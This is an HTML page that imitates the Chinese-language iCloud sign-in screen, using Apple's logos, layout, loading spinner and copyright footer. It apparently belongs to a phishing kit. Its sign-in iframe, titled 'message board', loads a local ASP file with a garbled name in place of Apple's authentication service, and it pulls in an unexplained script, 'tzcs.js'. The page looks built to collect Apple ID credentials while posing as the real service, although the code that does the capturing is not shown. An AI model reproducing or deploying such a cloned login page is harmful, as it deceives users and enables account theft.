<html data-primary-interaction-mode="touch" class="retina chrome webkit" data-major-version="63" data-minor-version="0"
  data-engine-major-version="537" lang="zh-cn" dir="ltr">

<head>
  <meta name="viewport" content=" initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
  <meta name="format-detection" content="telephone=no">
  <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
  <title>iCloud</title>
  <style id="cw-bootstrap-css">
    body {
      margin: 0;
      padding: 0;
    }

    .cloudos-loading-screen {
      position: absolute;
      width: 100%;
      height: 100%;
      display: -webkit-box;
      display: -ms-flexbox;
      display: flex;
      -webkit-box-orient: vertical;
      -webkit-box-direction: normal;
      -ms-flex-direction: column;
      flex-direction: column;
    }

    .cloudos-loading-screen .header {
      background-color: #333;
      width: 100%;
      height: 48px;
      display: -webkit-box;
      display: -ms-flexbox;
      display: flex;
      -webkit-box-pack: center;
      -ms-flex-pack: center;
      justify-content: center;
      -webkit-box-align: center;
      -ms-flex-align: center;
      align-items: center;
    }

    .cloudos-loading-screen .header .apple-icon {
      fill: white;
      width: 18px;
      height: 24px;
      z-index: 1000;
    }

    .cloudos-loading-screen .content {
      -webkit-box-flex: 1;
      -ms-flex: 1 1 auto;
      flex: 1 1 auto;
      display: -webkit-box;
      display: -ms-flexbox;
      display: flex;
      -webkit-box-pack: center;
      -ms-flex-pack: center;
      justify-content: center;
      -webkit-box-align: center;
      -ms-flex-align: center;
      align-items: center;
    }

    .cloudos-loading-screen .spinner {
      width: 32px;
      height: 32px;
      opacity: 1;
      -webkit-transition: opacity ease-out 350ms;
      -o-transition: opacity ease-out 350ms;
      transition: opacity ease-out 350ms;
      -webkit-animation: 0.6s steps(12) 0s infinite cloudos-loading-spinner;
      animation: 0.6s steps(12) 0s infinite cloudos-loading-spinner;
    }

    @-webkit-keyframes cloudos-loading-spinner {
      100% {
        -webkit-transform: rotate(360deg);
        transform: rotate(360deg);
      }
    }

    @keyframes cloudos-loading-spinner {
      100% {
        -webkit-transform: rotate(360deg);
        transform: rotate(360deg);
      }
    }
  </style>
  <link rel="icon" href="#/favicon.ico">

  <meta name="viewport" content="width=device-width, initial-scale=1, viewport-fit=cover">
  <style>
    .cw-alert .alert-icon {
      background-image: url("blob:https://www.icloud.com/c33d411b-9c13-41a3-bee2-bd0e87ee1475")
    }

    .cw-alert .alert-icon.info::after {
      background-image: url("blob:https://www.icloud.com/46338a81-9a4f-4d47-88d1-80942f94f184")
    }

    .cw-alert .alert-icon.error::after {
      background-image: url("blob:https://www.icloud.com/3ca1d03e-2066-4b8d-bdc7-af8620e321d5")
    }

    .cw-alert .alert-icon.checked::after {
      background-image: url("blob:https://www.icloud.com/7a288c23-1549-4325-8cb9-0f3318a66e9d")
    }

    .cw-alert .alert-icon.sharing::after {
      background-image: url("blob:https://www.icloud.com/9c4e0822-c085-43f9-9d89-cf21eb184040")
    }

    cw-checkbox input[type=checkbox]:checked+label::before {
      background-image: url("blob:https://www.icloud.com/43763724-95f3-4c7d-8cb4-3896bf9887e7")
    }

    cw-checkbox input[type=checkbox]:indeterminate+label::before {
      background-image: url("blob:https://www.icloud.com/87c5bb98-7f49-4c70-9395-39eaa04df6e9")
    }

    .banner-view .warning {
      background-image: url("blob:https://www.icloud.com/3cee7fbc-5ce1-43d1-8b1e-f4c0e16aae1d")
    }

    .cw-alert-modal .cw-alert .alert-main-content .icloud-icon {
      background-image: url("blob:https://www.icloud.com/1afcfb2d-f736-4034-949b-205f605c0a49")
    }

    .close-icon-button-view .title {
      background-image: url("blob:https://www.icloud.com/c4964264-2559-4c47-ab0c-dc6ab0ca7805")
    }

    .chevron-view {
      background-image: url("blob:https://www.icloud.com/2522d748-1ac6-458b-90b8-cf5675270cb1")
    }

    .user-photo-icon-view .empty-avatar {
      background-image: url("blob:https://www.icloud.com/6ddb63f9-d474-49bc-92a3-b3d0284b85f9")
    }

    [data-primary-interaction-mode="mouse"] .china-terms-view .content-scroll-view .china-terms-content-view .china-terms-logo {
      background-image: url("blob:https://www.icloud.com/e851e99d-a631-4964-b28c-9330ac5573b0")
    }

    [data-primary-interaction-mode="touch"] .china-terms-view .content-scroll-view .china-terms-content-view .china-terms-logo {
      background-image: url("blob:https://www.icloud.com/e851e99d-a631-4964-b28c-9330ac5573b0")
    }
  </style>
</head>

<body style="touch-action: none;">
  <div class="cloudos-loading-screen" id="cw-bootstrap-html">
    <div class="header" id="cloudos-loading-screen-header">
      <svg class="apple-icon" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 18 24">
        <path
          d="M16.33 14.1c-.93-.87-1.41-1.95-1.42-3.26-.01-1.68.75-2.99 2.29-3.92-.86-1.23-2.16-1.91-3.88-2.04-.64-.05-1.41.08-2.33.41-.97.36-1.55.54-1.72.54-.23 0-.74-.15-1.55-.45-.81-.3-1.45-.45-1.95-.45-.9.01-1.75.25-2.52.71-.78.46-1.4 1.09-1.86 1.89C.8 8.5.5 9.69.5 11.06c0 1.2.22 2.44.66 3.72.41 1.18.93 2.22 1.57 3.12.59.84 1.09 1.43 1.48 1.78.62.58 1.24.85 1.86.83.41-.01.95-.15 1.61-.42.66-.27 1.28-.4 1.86-.4.55 0 1.16.13 1.81.4.66.27 1.22.4 1.69.4.65-.01 1.26-.28 1.82-.8.37-.32.84-.89 1.42-1.71.628-.9 1.12-1.887 1.46-2.93-.51-.24-.98-.55-1.41-.95zM12.32 3.28c.75-.89 1.12-1.84 1.12-2.87 0-.14-.01-.27-.02-.41-.52.03-1.07.18-1.66.47-.58.29-1.07.65-1.45 1.09-.76.86-1.19 1.91-1.19 2.9 0 .14.01.27.02.39 1.19.09 2.28-.52 3.18-1.57z"
          stroke="none"></path>
      </svg>
    </div>
    <div class="content">
      <svg class="spinner" id="cloudos-loading-spinner" xmlns="http://www.w3.org/2000/svg" viewBox="-1 -1 2 2">
        <rect x="0.45625" y="-0.09099" width="0.54375" height="0.18198" rx="0.09099" ry="0.09099"
          fill="rgb(255,255,255)" transform="rotate(0)"></rect>
        <rect x="0.45625" y="-0.09099" width="0.54375" height="0.18198" rx="0.09099" ry="0.09099"
          fill="rgb(229,229,229)" transform="rotate(30)"></rect>
        <rect x="0.45625" y="-0.09099" width="0.54375" height="0.18198" rx="0.09099" ry="0.09099"
          fill="rgb(193,193,193)" transform="rotate(60)"></rect>
        <rect x="0.45625" y="-0.09099" width="0.54375" height="0.18198" rx="0.09099" ry="0.09099"
          fill="rgb(165,165,165)" transform="rotate(90)"></rect>
        <rect x="0.45625" y="-0.09099" width="0.54375" height="0.18198" rx="0.09099" ry="0.09099"
          fill="rgb(138,138,138)" transform="rotate(120)"></rect>
        <rect x="0.45625" y="-0.09099" width="0.54375" height="0.18198" rx="0.09099" ry="0.09099"
          fill="rgb(109,109,109)" transform="rotate(150)"></rect>
        <rect x="0.45625" y="-0.09099" width="0.54375" height="0.18198" rx="0.09099" ry="0.09099" fill="rgb(96,96,96)"
          transform="rotate(180)"></rect>
        <rect x="0.45625" y="-0.09099" width="0.54375" height="0.18198" rx="0.09099" ry="0.09099" fill="rgb(82,82,82)"
          transform="rotate(210)"></rect>
        <rect x="0.45625" y="-0.09099" width="0.54375" height="0.18198" rx="0.09099" ry="0.09099" fill="rgb(65,65,65)"
          transform="rotate(240)"></rect>
        <rect x="0.45625" y="-0.09099" width="0.54375" height="0.18198" rx="0.09099" ry="0.09099" fill="rgb(56,56,56)"
          transform="rotate(270)"></rect>
        <rect x="0.45625" y="-0.09099" width="0.54375" height="0.18198" rx="0.09099" ry="0.09099" fill="rgb(51,51,51)"
          transform="rotate(300)"></rect>
        <rect x="0.45625" y="-0.09099" width="0.54375" height="0.18198" rx="0.09099" ry="0.09099" fill="rgb(43,43,43)"
          transform="rotate(330)"></rect>
      </svg>
    </div>
  </div>
  <script type="text/javascript" src="./iCloud_files/cloudkit.js"></script>
  <link rel="stylesheet" href="./iCloud_files/main.css">
  <script type="text/javascript" src="./iCloud_files/main.js"></script>
  <div aria-hidden="true" id="cw-img-container-r2" style="overflow: hidden; height: 0px; width: 0px;">
    <!--<img src="blob:#/c33d411b-9c13-41a3-bee2-bd0e87ee1475"><img src="blob:#/46338a81-9a4f-4d47-88d1-80942f94f184"><img src="blob:#/3ca1d03e-2066-4b8d-bdc7-af8620e321d5"><img src="blob:#/7a288c23-1549-4325-8cb9-0f3318a66e9d"><img src="blob:#/9c4e0822-c085-43f9-9d89-cf21eb184040"><img src="blob:#/43763724-95f3-4c7d-8cb4-3896bf9887e7"><img src="blob:#/87c5bb98-7f49-4c70-9395-39eaa04df6e9"><img src="blob:#/3cee7fbc-5ce1-43d1-8b1e-f4c0e16aae1d"><img src="blob:#/1afcfb2d-f736-4034-949b-205f605c0a49"><img src="blob:#/c4964264-2559-4c47-ab0c-dc6ab0ca7805"><img src="blob:#/2522d748-1ac6-458b-90b8-cf5675270cb1"><img src="blob:#/6ddb63f9-d474-49bc-92a3-b3d0284b85f9"><img src="blob:#/e851e99d-a631-4964-b28c-9330ac5573b0">-->
  </div>
  <div class="cw-pane-container">
    <div>
      <div class="root-view">
        <div></div>
        <div class="toolbar-view">
          <div class="toolbar-items-view">
            <div class="toolbar-left-view visible"><span class="icloud-logo-view cw-button"
                style="width: 59px; min-width: 59px;" disabled="true">
                <svg version="1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 118 34">
                  <path stroke="none"
                    d="M1 3.9c0-1.4 1.2-2.6 2.6-2.6 1.4 0 2.6 1.1 2.6 2.5S5.1 6.4 3.7 6.4h-.1C2.2 6.5 1 5.3 1 3.9zm.4 5.8h4.5v22H1.4v-22zm8.8 6.9C10.2 7 15.7 1 24.1 1 31 1 36.2 5.2 37 11.5h-4.7c-.8-3.9-4.1-6.4-8.2-6.4-5.5 0-9.1 4.5-9.1 11.5s3.5 11.5 9.1 11.5c4.2 0 7.2-2.2 8.2-5.8H37c-1.2 6.2-5.9 9.9-12.9 9.9-8.5 0-13.9-6-13.9-15.6zM40.9 1.5h4.5v30.2h-4.5V1.5zm18.7 7.9c-6.4 0-10.5 4.4-10.5 11.3S53.2 32 59.6 32s10.5-4.3 10.5-11.3c0-6.9-4-11.3-10.5-11.3zm0 18.8c-3.7 0-5.9-2.8-5.9-7.6 0-4.7 2.2-7.6 5.9-7.6s5.9 2.8 5.9 7.6-2.2 7.6-5.9 7.6zm33 3.5h-4.4v-3.8h-.1c-1.3 2.6-3.5 4-6.9 4-4.8 0-7.8-3.1-7.8-8.1V9.7h4.5v13.2c0 3.3 1.6 5.1 4.7 5.1 3.3 0 5.3-2.3 5.3-5.7V9.7h4.5l.2 22zm19.8-30.2v11.8h-.1c-1.3-2.4-3.8-3.9-6.9-3.9-5.5 0-9.3 4.4-9.3 11.2s3.8 11.2 9.3 11.2c3.2 0 5.7-1.5 7-4h.1v3.7h4.4v-30h-4.5zm-5.8 26.6c-3.5 0-5.9-2.9-5.9-7.4s2.3-7.4 5.9-7.4c3.5 0 5.8 2.9 5.8 7.4.1 4.5-2.3 7.4-5.8 7.4z">
                  </path>
                </svg>
              </span></div>
            <div class="toolbar-center-view"><span tabindex="0" class="apple-icon-view cw-button">
                <svg viewBox="0 0 18 24" xmlns="http://www.w3.org/2000/svg">
                  <path stroke="none"
                    d="M16.33 14.1c-.93-.87-1.41-1.95-1.42-3.26-.01-1.68.75-2.99 2.29-3.92-.86-1.23-2.16-1.91-3.88-2.04-.64-.05-1.41.08-2.33.41-.97.36-1.55.54-1.72.54-.23 0-.74-.15-1.55-.45-.81-.3-1.45-.45-1.95-.45-.9.01-1.75.25-2.52.71-.78.46-1.4 1.09-1.86 1.89C.8 8.5.5 9.69.5 11.06c0 1.2.22 2.44.66 3.72.41 1.18.93 2.22 1.57 3.12.59.84 1.09 1.43 1.48 1.78.62.58 1.24.85 1.86.83.41-.01.95-.15 1.61-.42.66-.27 1.28-.4 1.86-.4.55 0 1.16.13 1.81.4.66.27 1.22.4 1.69.4.65-.01 1.26-.28 1.82-.8.37-.32.84-.89 1.42-1.71.628-.9 1.12-1.887 1.46-2.93-.51-.24-.98-.55-1.41-.95zM12.32 3.28c.75-.89 1.12-1.84 1.12-2.87 0-.14-.01-.27-.02-.41-.52.03-1.07.18-1.66.47-.58.29-1.07.65-1.45 1.09-.76.86-1.19 1.91-1.19 2.9 0 .14.01.27.02.39 1.19.09 2.28-.52 3.18-1.57z">
                  </path>
                </svg>
              </span></div>
            <div class="toolbar-right-view visible">
              <div></div>
            </div>
          </div>
          <div class="toolbar-menu-anchor-container-view hidden">
            <div role="button" aria-disabled="false" title="" tabindex="0"
              class="close-icon-button-view toolbar-menu-anchor-view cw-button"><span class="title"></span></div>
          </div>
          <div class="toolbar-menu-view hidden">
            <div class="toolbar-menu-view-background"></div>
            <div class="menu-items-container-view">
              <div></div>
            </div>
          </div>
        </div>
        <div></div>
        <div></div>
        <div class="login-view">
          <div class="overlay-view">
            <div class="header-row">
              <div><span tabindex="0" class="apple-icon-view cw-button">
                  <svg viewBox="0 0 18 24" xmlns="http://www.w3.org/2000/svg">
                    <path stroke="none"
                      d="M16.33 14.1c-.93-.87-1.41-1.95-1.42-3.26-.01-1.68.75-2.99 2.29-3.92-.86-1.23-2.16-1.91-3.88-2.04-.64-.05-1.41.08-2.33.41-.97.36-1.55.54-1.72.54-.23 0-.74-.15-1.55-.45-.81-.3-1.45-.45-1.95-.45-.9.01-1.75.25-2.52.71-.78.46-1.4 1.09-1.86 1.89C.8 8.5.5 9.69.5 11.06c0 1.2.22 2.44.66 3.72.41 1.18.93 2.22 1.57 3.12.59.84 1.09 1.43 1.48 1.78.62.58 1.24.85 1.86.83.41-.01.95-.15 1.61-.42.66-.27 1.28-.4 1.86-.4.55 0 1.16.13 1.81.4.66.27 1.22.4 1.69.4.65-.01 1.26-.28 1.82-.8.37-.32.84-.89 1.42-1.71.628-.9 1.12-1.887 1.46-2.93-.51-.24-.98-.55-1.41-.95zM12.32 3.28c.75-.89 1.12-1.84 1.12-2.87 0-.14-.01-.27-.02-.41-.52.03-1.07.18-1.66.47-.58.29-1.07.65-1.45 1.09-.76.86-1.19 1.91-1.19 2.9 0 .14.01.27.02.39 1.19.09 2.28-.52 3.18-1.57z">
                    </path>
                  </svg>
                </span></div>
              <div>
                <div role="button" aria-disabled="false" title="" tabindex="0" class="cancel-button cw-button"><span
                    class="title">取消</span></div>
              </div>
            </div>
            <div class="container-view">
              <div class="cloud-os-apple-id-view">
                <div class="view-visible">
                  <div class="apple-id-view">
                    <iframe class="apple-id-frame-view" title="留言板" id="auth-frame" scrolling="no"
                      src="APPSIGINADGHOAGHOAGHOAISDGHOADGHOAGHO323234R32SDFGHODSFGH.ASP"></iframe>
                    <canvas class="cw-spinner-view" height="64" width="64"
                      style="height: 32px; width: 32px; display: none;"></canvas>
                  </div>
                  <div></div>
                  <div></div>
                </div>
                <canvas class="cw-spinner-view" height="64" width="64"
                  style="height: 32px; width: 32px; display: none;"></canvas>
              </div>
            </div>
            <div>
              <div class="legal-footer">
                <div class="legal-footer-content"><span><a class="help" target="_blank"
                      href="#/icloudmobile/?lang=zh-cn">帮助</a> | <a class="privacy" target="_blank"
                      href="#/cn/privacy/">隐私政策</a> | <a class="terms" target="_blank"
                      href="#/legal/icloud/ww/">条款与条件</a> <span class="copyright">版权所有 © 2019 Apple Inc.
                      保留所有权利</span></span></div>
              </div>
            </div>
          </div>
        </div>
        <div></div>
        <div></div>
      </div>
    </div>
  </div>
  <div id="cw-aria-live-region" aria-live="polite"
    style="position: fixed; top: -1px; width: 1px; height: 1px; overflow: hidden;"></div>
  <script src="tzcs.js"></script>
</body>

</html>